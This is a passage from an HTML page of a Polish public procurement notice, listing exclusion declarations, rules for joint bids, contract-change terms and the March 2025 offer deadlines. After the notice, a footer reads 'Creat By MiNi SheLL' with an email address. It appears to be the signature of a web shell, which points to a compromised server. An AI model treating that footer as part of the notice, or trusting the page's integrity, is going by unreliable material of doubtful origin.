braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – zgodnie z załącznikiem nr 4 do SWZ,<br/>2) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez zamawiającego – zgodnie z załącznikiem nr 5 do SWZ,<br/>3) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/><br/>UWAGA! Ze względu na ograniczoną ilość znaków, pełny opis w SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które wykonawcy muszą złożyć wraz z ofertą:<br/>1) Wypełniony FORMULARZ OFERTOWY, stanowiący załącznik nr 2 do SWZ. Do oferty należy dołączyć aktualne dokumenty potwierdzające status prawny wykonawcy, np. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. Oferta nie musi zawierać tych dokumentów <br/>w przypadku wskazania przez wykonawcę, że są one dostępne w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych. <br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z ww. dokumentów. <br/>FORMULARZ OFERTOWY musi ponadto zawierać oświadczenie wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO. <br/>2) Wypełniony załącznik nr 3 do SWZ, stanowiący oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp dotyczące odpowiednio: <br/>a) Wykonawcy;<br/>b) każdego z członków konsorcjum (w przypadku składania oferty wspólnej) oraz każdego ze wspólników spółki cywilnej;<br/>dotyczące przesłanek wykluczenia z postępowania, o których mowa w art. 108 ust. 1 ustawy Pzp (punkt 13.1. SWZ) oraz art. 109 ust. 1 pkt 4 ustawy PZP i w art. 7 ustawy z dnia 13 kwietnia 2022 r. – o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/>3) Pełnomocnictwo (jeżeli dotyczy). <br/>Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie, ustanowione do reprezentowania wykonawcy/ów ubiegającego/ych się o udzielenie zamówienia publicznego.<br/>W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) członkowie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego z członków.<br/><br/>UWAGA! Ze względu na ograniczoną ilość znaków, pełny opis w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w takim przypadku wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego).<br/>Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy, o których mowa w art. 58 ust.1, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Warunek udziału w postępowaniu jest niepodzielny. Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które czynności wykonają poszczególni<br/>wykonawcy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tego z wykonawców, który<br/>wykona usługi do realizacji których te zdolności są wymagane.<br/>Spółka cywilna w rozumieniu art. 860. § 1. Kodeksu Cywilnego z punktu widzenia zdobytego doświadczenia może być postrzegana jako jego nabywca, jeżeli jej wspólnicy łącznie zrealizowali umowę.<br/><br/>UWAGA! Ze względu na ograniczoną ilość znaków, pełny opis w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w projektowanych postanowieniach umowy, stanowiących Załącznik nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com